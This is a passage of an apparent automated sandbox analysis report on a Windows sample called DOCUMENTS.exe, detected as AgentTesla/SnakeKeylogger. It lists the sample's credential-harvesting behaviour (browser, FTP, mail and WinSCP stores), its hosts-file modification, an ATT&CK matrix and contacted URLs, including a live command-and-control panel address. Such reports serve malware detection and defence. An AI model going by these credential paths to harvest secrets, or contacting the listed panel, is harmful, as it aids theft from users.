                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.DOCUMENTS.exe.a7c30b8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DOCUMENTS.exe.a7c30b8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.294334493.000000000A8E8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.293912263.000000000A721000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.520256174.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOCUMENTS.exe PID: 1864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1488, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1488, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.DOCUMENTS.exe.a7c30b8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DOCUMENTS.exe.a7c30b8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.294334493.000000000A8E8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.293912263.000000000A721000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.520256174.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOCUMENTS.exe PID: 1864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1488, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Access Token Manipulation1File and Directory Permissions Modification1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection312Disable or Modify Tools11Input Capture11System Information Discovery115Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Deobfuscate/Decode Files or Information1Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSecurity Software Discovery311Distributed Component Object ModelInput Capture11Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      DOCUMENTS.exe18%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exe18%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      9.2.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/osof0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn8g0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://cUpnXtBcsknsdD.com0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.fontbureau.come.com$u0%Avira URL Cloudsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/seb0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://161.129.64.490%Avira URL Cloudsafe
                      http://161.129.64.49/webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php0%Avira URL Cloudsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.krFeSi0%Avira URL Cloudsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.fonts.comx0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://www.fontbureau.comasc0%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.fonts.comc0%URL Reputationsafe
                      http://www.sajatypeworks.coms0%Avira URL Cloudsafe
                      http://www.sandoll.co.krt0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://www.founder.com.c0%URL Reputationsafe
                      http://www.tiro.comn0%URL Reputationsafe
                      https://api.ipify.org%(0%Avira URL Cloudsafe
                      http://161.129.64.49x&0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.fontbureau.coma0%URL Reputationsafe
                      http://www.founder.com.cn/cnhgN0%Avira URL Cloudsafe
                      http://xJKvnt.com0%Avira URL Cloudsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.founder.com.cn/cn/0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn60%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.sajatypeworks.coma-d0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Yu0%Avira URL Cloudsafe
                      http://161.129.64.49/webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php127.0.0.1POST0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cnle:gKg0%Avira URL Cloudsafe
                      http://www.sajatypeworks.comibi_0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://161.129.64.49/webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.phptrue
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://www.fontbureau.com/designersGDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                        high
                        http://www.jiyu-kobo.co.jp/osofDOCUMENTS.exe, 00000000.00000003.257338663.0000000005AE4000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.com/designers/?DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/bTheDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers?DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                            high
                            http://www.founder.com.cn/cn8gDOCUMENTS.exe, 00000000.00000003.254947083.0000000005B1D000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tiro.comDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersDOCUMENTS.exe, 00000000.00000003.260935512.0000000005AE9000.00000004.00000001.sdmpfalse
                              high
                              http://cUpnXtBcsknsdD.comMSBuild.exe, 00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmp, MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.goodfont.co.krDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.come.com$uDOCUMENTS.exe, 00000000.00000002.292439834.0000000005AE0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://www.sajatypeworks.comDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn/cTheDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.galapagosdesign.com/staff/dennis.htmDOCUMENTS.exe, 00000000.00000002.292439834.0000000005AE0000.00000004.00000001.sdmp, DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://fontfabrik.comDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/sebDOCUMENTS.exe, 00000000.00000003.257338663.0000000005AE4000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.galapagosdesign.com/DPleaseDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.ipify.org%GETMozilla/5.0MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              low
                              http://161.129.64.49MSBuild.exe, 00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fonts.comDOCUMENTS.exe, 00000000.00000003.252497884.0000000005AFB000.00000004.00000001.sdmpfalse
                                high
                                http://www.sandoll.co.krDOCUMENTS.exe, 00000000.00000003.254341564.0000000005AE6000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.sandoll.co.krFeSiDOCUMENTS.exe, 00000000.00000003.254341564.0000000005AE6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.urwpp.deDPleaseDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.zhongyicts.com.cnDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.sakkal.comDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fonts.comxDOCUMENTS.exe, 00000000.00000003.252497884.0000000005AFB000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipDOCUMENTS.exe, 00000000.00000002.294334493.000000000A8E8000.00000004.00000001.sdmp, MSBuild.exe, 00000009.00000002.520256174.0000000000402000.00000040.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.comascDOCUMENTS.exe, 00000000.00000002.292439834.0000000005AE0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.apache.org/licenses/LICENSE-2.0DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.comDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                                    high
                                    http://DynDns.comDynDNSMSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fonts.comcDOCUMENTS.exe, 00000000.00000003.252461730.0000000005AFB000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.comsDOCUMENTS.exe, 00000000.00000003.252219497.0000000005AFB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sandoll.co.krtDOCUMENTS.exe, 00000000.00000003.254341564.0000000005AE6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haMSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cDOCUMENTS.exe, 00000000.00000003.254970840.0000000005AE4000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.tiro.comnDOCUMENTS.exe, 00000000.00000003.253296632.0000000005AFB000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.ipify.org%(MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://161.129.64.49x&MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://www.jiyu-kobo.co.jp/jp/DOCUMENTS.exe, 00000000.00000003.257338663.0000000005AE4000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.comaDOCUMENTS.exe, 00000000.00000002.292439834.0000000005AE0000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cnhgNDOCUMENTS.exe, 00000000.00000003.254947083.0000000005B1D000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://xJKvnt.comMSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
